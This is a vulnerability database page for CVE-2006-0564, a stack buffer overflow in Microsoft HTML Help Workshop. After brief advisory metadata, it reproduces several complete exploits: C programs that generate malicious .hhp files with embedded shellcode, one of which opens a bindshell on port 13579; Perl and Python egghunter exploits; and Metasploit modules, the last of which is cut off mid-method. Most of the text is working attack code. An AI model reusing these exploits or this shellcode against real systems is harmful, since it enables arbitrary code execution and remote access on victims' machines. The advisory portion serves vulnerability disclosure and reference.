CVE-2006-0564
CVSS 7.5
Published: 2006-02-06 18:02:00
Revised: 2011-03-07 21:30:20

[Original] Stack-based buffer overflow in Microsoft HTML Help Workshop 4.74.8702.0, and possibly earlier versions, and as included in the Microsoft HTML Help 1.4 SDK, allows context-dependent attackers to execute arbitrary code via a .hhp file with a long Contents file field.


[CNNVD] Microsoft HTML Help Workshop Stack Buffer Overflow Vulnerability (CNNVD-200602-066)

A stack-based buffer overflow exists in Microsoft HTML Help Workshop 4.74.8702.0 (and possibly earlier versions) and in the Microsoft HTML Help 1.4 SDK. A context-dependent attacker can execute arbitrary code via a .hhp file with a long Contents file field.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:microsoft:html_help:1.4::sdk
cpe:/a:microsoft:html_help_workshop:4.74.8702.0    Microsoft html_help_workshop 4.74.8702.0

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0564
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0564
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-066
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/124460
(UNKNOWN)  CERT-VN  VU#124460
http://www.vupen.com/english/advisories/2006/0446
(UNKNOWN)  VUPEN  ADV-2006-0446
http://users.pandora.be/bratax/advisories/b008.html
(UNKNOWN)  MISC  http://users.pandora.be/bratax/advisories/b008.html
http://securitytracker.com/id?1015585
(UNKNOWN)  SECTRACK  1015585
http://secunia.com/advisories/18740
(VENDOR_ADVISORY)  SECUNIA  18740
http://xforce.iss.net/xforce/xfdb/24481
(UNKNOWN)  XF  mshtmlhelp-workshop-hhp-bo(24481)
http://www.osvdb.org/22941
(UNKNOWN)  OSVDB  22941

- Vulnerability information

Microsoft HTML Help Workshop Stack Buffer Overflow Vulnerability
High severity    Buffer overflow
2006-02-06 00:00:00 2006-02-08 00:00:00
Remote

- Advisories and patches

- Vulnerability information (1470)

Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit (EDBID:1470)
windows local
2006-02-06 Verified
0 bratax
/*
Microsoft HTML Help Workshop .hhp file Buffer Overflow Exploit
by bratax (http://www.bratax.be/)

-> greets to:
all my miffm00f buddies, BuzzDee and everyone else I forgot who should be in here
-> thx to:
Curt Wilson @ SIUC (maybe you don't know why but this exploit wouldn't
exist if we didn't have that conversation a long long time ago)
nolimit & buzzdee (I used most of your realplayer .smil exploit code because I
didn't feel like writing this code from scratch :p)
-> special thx to:
duksie, dwarf & turb00 (you guys know why)

C:\htmlws>poc2
Microsoft HTML Help Workshop Buffer Overflow.
Coded by bratax (http://www.bratax.be/).
Usage: C:\htmlws\PoC2.exe <outputfile>

C:\htmlws>poc2 new.hhp
File written.
Open with Microsoft Help Workshop to exploit.

C:\htmlws>nc -vv localhost 13579
DNS fwd/rev mismatch: RENEE != localhost
RENEE [127.0.0.1] 13579 (?) open
Microsoft Windows XP [versie 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\htmlws>exit
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char pre[]=
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=bratax.chm\n"
"Contents file=";

char end[]=
"Display compile progress=No\n"
"Language=0x813 Dutch (Belgium)\n\n\n"
"[INFOTYPES]";

char shellcode[]=
/* bindshell port 13579 thx to metasploit.com :) */
"\x29\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8f"
"\x35\x37\x85\x83\xeb\xfc\xe2\xf4\x73\x5f\xdc\xca\x67\xcc\xc8\x7a"
"\x70\x55\xbc\xe9\xab\x11\xbc\xc0\xb3\xbe\x4b\x80\xf7\x34\xd8\x0e"
"\xc0\x2d\xbc\xda\xaf\x34\xdc\x66\xbf\x7c\xbc\xb1\x04\x34\xd9\xb4"
"\x4f\xac\x9b\x01\x4f\x41\x30\x44\x45\x38\x36\x47\x64\xc1\x0c\xd1"
"\xab\x1d\x42\x66\x04\x6a\x13\x84\x64\x53\xbc\x89\xc4\xbe\x68\x99"
"\x8e\xde\x34\xa9\x04\xbc\x5b\xa1\x93\x54\xf4\xb4\x4f\x51\xbc\xc5"
"\xbf\xbe\x77\x89\x04\x45\x2b\x28\x04\x75\x3f\xdb\xe7\xbb\x79\x8b"
"\x63\x65\xc8\x53\xbe\xee\x51\xd6\xe9\x5d\x04\xb7\xe7\x42\x44\xb7"
"\xd0\x61\xc8\x55\xe7\xfe\xda\x79\xb4\x65\xc8\x53\xd0\xbc\xd2\xe3"
"\x0e\xd8\x3f\x87\xda\x5f\x35\x7a\x5f\x5d\xee\x8c\x7a\x98\x60\x7a"
"\x59\x66\x64\xd6\xdc\x66\x74\xd6\xcc\x66\xc8\x55\xe9\x5d\x02\x8e"
"\xe9\x66\xbe\x64\x1a\x5d\x93\x9f\xff\xf2\x60\x7a\x59\x5f\x27\xd4"
"\xda\xca\xe7\xed\x2b\x98\x19\x6c\xd8\xca\xe1\xd6\xda\xca\xe7\xed"
"\x6a\x7c\xb1\xcc\xd8\xca\xe1\xd5\xdb\x61\x62\x7a\x5f\xa6\x5f\x62"
"\xf6\xf3\x4e\xd2\x70\xe3\x62\x7a\x5f\x53\x5d\xe1\xe9\x5d\x54\xe8"
"\x06\xd0\x5d\xd5\xd6\x1c\xfb\x0c\x68\x5f\x73\x0c\x6d\x04\xf7\x76"
"\x25\xcb\x75\xa8\x71\x77\x1b\x16\x02\x4f\x0f\x2e\x24\x9e\x5f\xf7"
"\x71\x86\x21\x7a\xfa\x71\xc8\x53\xd4\x62\x65\xd4\xde\x64\x5d\x84"
"\xde\x64\x62\xd4\x70\xe5\x5f\x28\x56\x30\xf9\xd6\x70\xe3\x5d\x7a"
"\x70\x02\xc8\x55\x04\x62\xcb\x06\x4b\x51\xc8\x53\xdd\xca\xe7\xed"
"\xf1\xed\xd5\xf6\xdc\xca\xe1\x7a\x5f\x35\x37\x85";



char overflow[15000];	// 15k just to make sure :)
int main(int argc,char *argv[])
{

	FILE *vuln;
	if(argc == 1)
	{
		printf("Microsoft HTML Help Workshop Buffer Overflow.\n");
		printf("Coded by bratax (http://www.bratax.be/).\n");
		printf("Usage: %s <outputfile>\n",argv[0]);
		return 0;
	}
	vuln = fopen(argv[1],"w");
	//build overflow buffer here.
	memset(overflow,0x90,sizeof(overflow)); //fill with nops
	memcpy(overflow+272,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  1 of these is
	memcpy(overflow+276,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  enough but was
	memcpy(overflow+280,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  a bit lazy to
	memcpy(overflow+284,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  find out the
	memcpy(overflow+288,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)	correct one :p
	memcpy(overflow+292,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)
	memcpy(overflow+300,shellcode,sizeof(shellcode)); //our shellcode after some nops to land in (its NUL terminates the string)

	if(vuln)
	{
		//Write file
		fprintf(vuln,"%s%s\"/>\n%s",pre,overflow,end);
		fclose(vuln);
		printf("File written.\nOpen with Microsoft Help Workshop to exploit.\n");
	}
	else
	{
		//report the failure instead of claiming the file was written
		printf("Could not open %s for writing.\n",argv[1]);
		return 1;
	}
	return 0;
}

// milw0rm.com [2006-02-06]

- Vulnerability information (1490)

Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit (new) (EDBID:1490)
windows local
2006-02-11 Verified
0 k3xji
/*
Microsoft HTML Help Workshop .hhp file Compiled File Header Buffer Overflow Exploit
The buffer overflow is in the Compiled File field of the Options section of an HHP file.

Bug found by:darkeagle
Exploit coded by:k3xji
Mail:sumerc@gmail.com
Web: www.guvenliklab.com

Tested:Win XP SP2
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFLEN 0xe6

char sta[]=
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=";

char fin[]=
"Display compile progress=No\n"
"Language=Turkish\n\n\n"
"[INFOTYPES]";

char jmpcode[]= "\x5d\x38\x82\x7c\x5d\x38\x82\x7c\x90\x90\x90\x90\x83\xEC\x34\x90\x83\xEC\x78\x90\xFF\xE4\x90\x90";

char shellcode[]=
    //Taken from ATmaCA's Execute Calc.exe shellcode.Thx.A bit lazy to call ExitProcess:P
    "\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
    "\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48"
    "\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4"
    "\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12"
    "\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69"
    "\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6"
    "\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5"
    "\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21"
    "\x61\xdd\x0e\x4d";

int main(int argc,char *argv[])
{
	FILE *vuln;
	char *overflow;

	printf("\nMicrosoft Help WorkShop Compiled File Header Buffer Overflow");
	printf("\nBug discovered by darkeagle");
	printf("\nExploit coded by k3xji");
	printf("\nE-Mail: sumerc@gmail.com");

	/* one extra byte so the NUL terminator of jmpcode (offset 0xce + 24 = BUFLEN) stays in bounds */
	overflow = (char*)malloc(BUFLEN + 1);
	if(!overflow)
		return 1;
	vuln = fopen("poc.hhp","w");

	//build overflow buffer here.
	memset(overflow,0x90,BUFLEN);                       //fill noPs
	memcpy(overflow+0x2a,shellcode,sizeof(shellcode));  //shellcod3
	memcpy(overflow+0xce,jmpcode,sizeof(jmpcode));      //jmpcod3 (its NUL terminates the %s string)

	if(vuln)
	{
		//Write to the poc.hhp file
		fprintf(vuln,"%s%s\"/>\n%s",sta,overflow,fin);
		fclose(vuln);
		printf("\n\npoc.hhp file is written.\n");
		printf("Open file with Microsoft Help Workshop.\n");
	}
	else
		printf("\n\nCould not open poc.hhp for writing.\n");
	free(overflow);
	return 0;
}

// milw0rm.com [2006-02-11]

- Vulnerability information (7727)

Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit (EDBID:7727)
windows local
2009-01-12 Verified
0 SkD
#!/usr/bin/perl
# Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit
# -----------------------------------------------------------------
# Discovered/Exploit by SkD                    (skdrat@hotmail.com)
# -----------------------------------------------------------------
#
# This is a continuation of my new method, shellhunting.
# The exploit is far more advanced than the Amaya's as it runs on
# every system, partly because the shellhunter itself is very much
# reliable and universal.
# The shellhunter does the following tasks to find and exec.
# shellcode:-
#
# 1- Searches through the whole memory of the application.
# 2- Installs a SEH handler so on access violations it won't
#    stop hunting for the shellcode.
# 3- Repairs stack so a stack overflow won't occur (that is what
#    happens when the SEH is called up, many PUSH instructions
#    are called from the relevant modules (ntdll, etc).
# 4- Improved speed by searching through 32 bytes at a time.
# 5- Uses a certain address in memory to store a variable for the
#    search.
#
# It is very stable and will allow any shellcode (bind/reverse shell,
# dl/exec). It will work on ALL Windows NT versions (2k, XP, Vista).
#
# Yeah, I guess that's about it. Took me a few hours to figure out the
# whole thing but nothing is impossible ;).
#
# Oh, I think some schools use this software :) (it's Microsoft's, right?).
#
# You can download the app. from Microsoft's official page:
# ->  http://msdn.microsoft.com/en-us/library/ms669985.aspx
#
# If you are interested in my method and want to learn something new or
# improve your exploitation skills then visit my team's blog at:
# ->  http://abysssec.com
#
# Peace out,
# SkD.



my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53".   # "[OPTIONS"
                "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65".   # "]\r\nConte"
                "\x6E\x74\x73\x20\x66\x69\x6C\x65".   # "nts file"
                "\x3D\x41\x0D\x0A\x49\x6E\x64\x65".   # "=A\r\nInde"
                "\x78\x20\x66\x69\x6C\x65\x3D";       # "x file="
my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D".   # "[FILES]\r"
                "\x0A\x61\x2E\x68\x74\x6D";           # "\na.htm"
my $crlf      = "\x0d\x0a";

# win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x46".
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x56\x42\x32\x42\x41\x41\x32".
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x58\x69\x69\x6c\x4b".
"\x58\x62\x64\x65\x50\x67\x70\x47\x70\x6c\x4b\x42\x65\x45\x6c\x6e".
"\x6b\x73\x4c\x53\x35\x73\x48\x45\x51\x4a\x4f\x6c\x4b\x70\x4f\x52".
"\x38\x4c\x4b\x33\x6f\x55\x70\x57\x71\x6a\x4b\x61\x59\x4c\x4b\x36".
"\x54\x6e\x6b\x53\x31\x48\x6e\x55\x61\x39\x50\x4d\x49\x4c\x6c\x4d".
"\x54\x6b\x70\x74\x34\x66\x67\x4b\x71\x78\x4a\x56\x6d\x67\x71\x39".
"\x52\x48\x6b\x4c\x34\x35\x6b\x62\x74\x56\x44\x57\x74\x54\x35\x6b".
"\x55\x4e\x6b\x31\x4f\x65\x74\x67\x71\x5a\x4b\x50\x66\x6c\x4b\x56".
"\x6c\x42\x6b\x6e\x6b\x53\x6f\x47\x6c\x67\x71\x7a\x4b\x6c\x4b\x45".
"\x4c\x6c\x4b\x47\x71\x48\x6b\x4f\x79\x33\x6c\x44\x64\x73\x34\x49".
"\x53\x70\x31\x6b\x70\x71\x74\x4e\x6b\x73\x70\x56\x50\x4b\x35\x49".
"\x50\x62\x58\x66\x6c\x4c\x4b\x43\x70\x56\x6c\x4c\x4b\x50\x70\x45".
"\x4c\x4c\x6d\x6c\x4b\x35\x38\x77\x78\x78\x6b\x67\x79\x4e\x6b\x6b".
"\x30\x6c\x70\x57\x70\x63\x30\x33\x30\x4c\x4b\x32\x48\x67\x4c\x73".
"\x6f\x35\x61\x48\x76\x71\x70\x56\x36\x6c\x49\x4a\x58\x6e\x63\x69".
"\x50\x41\x6b\x56\x30\x65\x38\x6c\x30\x6f\x7a\x75\x54\x73\x6f\x31".
"\x78\x4e\x78\x79\x6e\x6f\x7a\x36\x6e\x66\x37\x6b\x4f\x5a\x47\x52".
"\x43\x65\x31\x30\x6c\x70\x63\x45\x50\x46";


#/----------------Advanced Shellhunter Code----------------\
#01D717DD   EB 1E            JMP SHORT 01D717FD            |
#01D717DF   83C4 64          ADD ESP,64                    |
#01D717E2   83C4 64          ADD ESP,64                    |
#01D717E5   83C4 64          ADD ESP,64                    |
#01D717E8   83C4 64          ADD ESP,64                    |
#01D717EB   83C4 64          ADD ESP,64                    |
#01D717EE   83C4 64          ADD ESP,64                    |
#01D717F1   83C4 64          ADD ESP,64                    |
#01D717F4   83C4 64          ADD ESP,64                    |
#01D717F7   83C4 64          ADD ESP,64                    |
#01D717FA   83C4 54          ADD ESP,54                    |
#01D717FD   33FF             XOR EDI,EDI                   |
#01D717FF   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
#01D71804   8B3A             MOV EDI,DWORD PTR DS:[EDX]    |
#01D71806   EB 0E            JMP SHORT 01D71816            |
#01D71808   58               POP EAX                       |
#01D71809   83E8 3C          SUB EAX,3C                    |
#01D7180C   50               PUSH EAX                      |
#01D7180D   6A FF            PUSH -1                       |
#01D7180F   33DB             XOR EBX,EBX                   |
#01D71811   64:8923          MOV DWORD PTR FS:[EBX],ESP    |
#01D71814   EB 05            JMP SHORT 01D7181B            |
#01D71816   E8 EDFFFFFF      CALL 01D71808                 |
#01D7181B   B8 12121212      MOV EAX,12121212              |
#01D71820   6BC0 02          IMUL EAX,EAX,2                |
#01D71823   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
#01D71828   83C7 20          ADD EDI,20                    |
#01D7182B   893A             MOV DWORD PTR DS:[EDX],EDI    |
#01D7182D   3907             CMP DWORD PTR DS:[EDI],EAX    |
#01D7182F  ^75 F7            JNZ SHORT 01D71828            |
#01D71831   83C7 04          ADD EDI,4                     |
#01D71834   6BC0 02          IMUL EAX,EAX,2                |
#01D71837   3907             CMP DWORD PTR DS:[EDI],EAX    |
#01D71839  ^75 E0            JNZ SHORT 01D7181B            |
#01D7183B   83C7 04          ADD EDI,4                     |
#01D7183E   B8 42424242      MOV EAX,42424242              |
#01D71843   3907             CMP DWORD PTR DS:[EDI],EAX    |
#01D71845  ^75 D4            JNZ SHORT 01D7181B            |
#01D71847   83C7 04          ADD EDI,4                     |
#01D7184A   FFE7             JMP EDI                       |
#\-----------------------End of Code----------------------/

my $shellhunter = "\xeb\x1e".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x54".
                  "\x33\xff".
                  "\xba\xd0\xfa\xfd\x7f".
                  "\x8b\x3a".
                  "\xeb\x0e".
                  "\x58".
                  "\x83\xe8\x3c".
                  "\x50".
                  "\x6a\xff".
                  "\x33\xdb".
                  "\x64\x89\x23".
                  "\xeb\x05".
                  "\xe8\xed\xff\xff\xff".
                  "\xb8\x12\x12\x12\x12".
                  "\x6b\xc0\x02".
                  "\xba\xd0\xfa\xfd\x7f".
                  "\x83\xc7\x20".
                  "\x89\x3a".
                  "\x39\x07".
                  "\x75\xf7".
                  "\x83\xc7\x04".
                  "\x6b\xc0\x02".
                  "\x39\x07".
                  "\x75\xe0".
                  "\x83\xc7\x04".
                  "\xb8\x42\x42\x42\x42".
                  "\x39\x07".
                  "\x75\xd4".
                  "\x83\xc7\x04".
                  "\xff\xe7";
my $lookout1 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42" x 64;
my $lookout2 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42" x 64;
my $lookout3 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42" x 64;
my $lookout4 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42\x42" x 64;
my $len = 280 - (length($shellhunter) + 55);
my $overflow1 = "\x41" x $len;
my $overflow2 = "\x41" x 55;
my $overflow3 = "\x42" x 256;
my $ret = "\x93\x1f\x40\x00"; #0x00401f93   CALL EDI [hhw.exe]


open(my $hhpprj_file, "> s.hhp") or die "Cannot write s.hhp: $!";
binmode($hhpprj_file);   # raw bytes: no newline translation on Windows
print $hhpprj_file $hhp_data1.
                   $overflow1.$shellhunter.$overflow2.$ret.
                   $crlf.$crlf.
                   $hhp_data2.
                   $overflow3.$lookout1.$lookout2.$lookout3.$lookout4.$shellcode.$overflow3.
                   $crlf;
close $hhpprj_file;

# milw0rm.com [2009-01-12]

- Vulnerability information (10321)

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (EDBID:10321)
windows local
2009-12-05 Verified
0 Encrypt3d.M!Nd
#exploit.py
#
# HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
# By: Encrypt3d.M!nd
#     http://m1nd3d.wordpress.com/
# Based on: http://www.milw0rm.com/exploits/7727
####################################################################
# Well, I've tested SkD's exploit on Win 7 and it didn't work. I think it's
# a shellhunter compatibility problem, so I wrote this and used the egg-hunting
# method. It would take some time to execute the shellcode, but it will run ;-)
#
#    Tested on : Windows xp sp3
#                Windows 7 ultimate
#



hhp_data1 =("\x5B\x4F\x50\x54\x49\x4F\x4E\x53"   # "[OPTIONS"
            "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65"   # "]\r\nConte"
            "\x6E\x74\x73\x20\x66\x69\x6C\x65"   # "nts file"
            "\x3D\x41\x0D\x0A\x49\x6E\x64\x65"   # "=A\r\nInde"
            "\x78\x20\x66\x69\x6C\x65\x3D")      # "x file="

crlf      =("\x0d\x0a")

hhp_data2 =("\x5B\x46\x49\x4C\x45\x53\x5D\x0D")

eggh= ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x69\x72\x61\x71\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

overflow1= "\x41" * 224


shellcode = "Devil_inside.htm"
shellcode+= "\x69\x72\x61\x71\x69\x72\x61\x71"
#
# windows/exec - 454 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=thread, CMD=calc
#
shellcode+=(
"\x89\xe5\xda\xd6\xd9\x75\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x49\x6c\x4b\x58\x4c\x49\x47\x70\x47\x70\x43\x30\x45\x30\x4b"
"\x39\x4b\x55\x44\x71\x4a\x72\x51\x74\x4c\x4b\x50\x52\x44\x70"
"\x4c\x4b\x43\x62\x46\x6c\x4e\x6b\x42\x72\x47\x64\x4e\x6b\x42"
"\x52\x46\x48\x44\x4f\x4f\x47\x51\x5a\x45\x76\x50\x31\x4b\x4f"
"\x45\x61\x49\x50\x4e\x4c\x47\x4c\x45\x31\x51\x6c\x43\x32\x44"
"\x6c\x45\x70\x4a\x61\x4a\x6f\x46\x6d\x47\x71\x48\x47\x48\x62"
"\x48\x70\x46\x32\x50\x57\x4e\x6b\x51\x42\x42\x30\x4e\x6b\x42"
"\x62\x47\x4c\x43\x31\x4e\x30\x4c\x4b\x47\x30\x42\x58\x4d\x55"
"\x4f\x30\x44\x34\x42\x6a\x46\x61\x4a\x70\x42\x70\x4e\x6b\x42"
"\x68\x44\x58\x4c\x4b\x43\x68\x51\x30\x43\x31\x4e\x33\x49\x73"
"\x47\x4c\x42\x69\x4c\x4b\x45\x64\x4e\x6b\x46\x61\x4b\x66\x50"
"\x31\x49\x6f\x44\x71\x4f\x30\x4e\x4c\x4f\x31\x4a\x6f\x44\x4d"
"\x46\x61\x4f\x37\x46\x58\x4b\x50\x51\x65\x49\x64\x44\x43\x43"
"\x4d\x48\x78\x47\x4b\x43\x4d\x46\x44\x43\x45\x49\x72\x51\x48"
"\x4c\x4b\x46\x38\x51\x34\x47\x71\x4a\x73\x51\x76\x4e\x6b\x44"
"\x4c\x42\x6b\x4e\x6b\x43\x68\x45\x4c\x43\x31\x4b\x63\x4e\x6b"
"\x45\x54\x4c\x4b\x45\x51\x4e\x30\x4f\x79\x51\x54\x44\x64\x51"
"\x34\x51\x4b\x51\x4b\x51\x71\x42\x79\x43\x6a\x42\x71\x49\x6f"
"\x4d\x30\x51\x48\x51\x4f\x43\x6a\x4c\x4b\x44\x52\x48\x6b\x4c"
"\x46\x51\x4d\x43\x5a\x47\x71\x4c\x4d\x4c\x45\x4e\x59\x45\x50"
"\x43\x30\x43\x30\x46\x30\x51\x78\x50\x31\x4e\x6b\x42\x4f\x4c"
"\x47\x4b\x4f\x48\x55\x4f\x4b\x4d\x30\x47\x6d\x44\x6a\x47\x7a"
"\x50\x68\x49\x36\x4f\x65\x4f\x4d\x4d\x4d\x4b\x4f\x4e\x35\x47"
"\x4c\x44\x46\x43\x4c\x47\x7a\x4b\x30\x49\x6b\x4d\x30\x43\x45"
"\x43\x35\x4d\x6b\x43\x77\x45\x43\x42\x52\x42\x4f\x42\x4a\x43"
"\x30\x43\x63\x4b\x4f\x4e\x35\x50\x63\x51\x71\x50\x6c\x45\x33"
"\x45\x50\x41\x41")

overflow2= "\x42" * 24
ret = ("\x93\x1f\x40\x00") # Call Edi - hhw.exe (universal huh?)

payload = (hhp_data1 + overflow1 + eggh + overflow2 + ret + crlf + crlf
           + hhp_data2 + crlf + shellcode + "\x41" * 4000)
# write raw bytes: latin-1 maps every \xNN escape above to exactly one byte,
# and binary mode avoids newline translation (also works under Python 3)
with open('Devil.hhp', 'wb') as out:
    out.write(payload.encode('latin-1'))

- Vulnerability information (16648)

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (EDBID:16648)
windows local
2010-09-25 Verified
0 metasploit
##
# $Id: hhw_hhp_contentfile_bof.rb 10477 2010-09-25 11:59:02Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',
			'Description'    => %q{
					This module exploits a stack buffer overflow in HTML Help Workshop 4.74.
					By creating a specially crafted hhp file, an attacker may be able
					to execute arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'bratax', 'jduck' ],
			'Version'        => '$Revision: 10477 $',
			'References'     =>
				[
					[ 'CVE', '2006-0564' ],
					[ 'OSVDB', '22941' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/1470' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/1495' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'DisablePayloadHandler' => 'true',
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x1a\x2f\x5c",
					'StackAdjustment' => -4800,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP English SP3', { 'Offset' => 280, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Feb 06 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME',   [ false, 'The file name.', 'msf.hhp']),
			], self.class)
	end

	def exploit

		# use the egghunter!
		eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

		off = target['Offset']
		idxf = ""
		idxf << make_nops(off - eh_stub.length)
		idxf << eh_stub
		idxf << [target.ret].pack('V')

		sploit = "[OPTIONS]\r\n"
		sploit << "Contents file="
		sploit << idxf
		sploit << "\r\n"
		sploit << "\r\n"
		sploit << "[FILES]\r\n"
		sploit << "\r\n"
		sploit << eh_egg

		hhp = sploit

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(hhp)
	end

end

- Vulnerability information (16683)

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (EDBID:16683)
windows local
2010-09-25 Verified
0 metasploit
##
# $Id: hhw_hhp_compiledfile_bof.rb 10477 2010-09-25 11:59:02Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',
			'Description'    => %q{
					This module exploits a stack buffer overflow in HTML Help Workshop 4.74.
					By creating a specially crafted hhp file, an attacker may be able
					to execute arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'bratax', 'jduck' ],
			'Version'        => '$Revision: 10477 $',
			'References'     =>
				[
					[ 'CVE', '2006-0564'],
					[ 'OSVDB', '22941'],
					[ 'URL', 'http://www.exploit-db.com/exploits/1488' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/1490' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'DisablePayloadHandler' => 'true',
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x1a\x2f\x5c",
					'StackAdjustment' => -4800,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP English SP3', { 'Offset' => 242, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Feb 06 2006',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME',   [ false, 'The file name.', 'msf.hhp']),
				], self.class)

	end

	def exploit

		# use the egghunter!
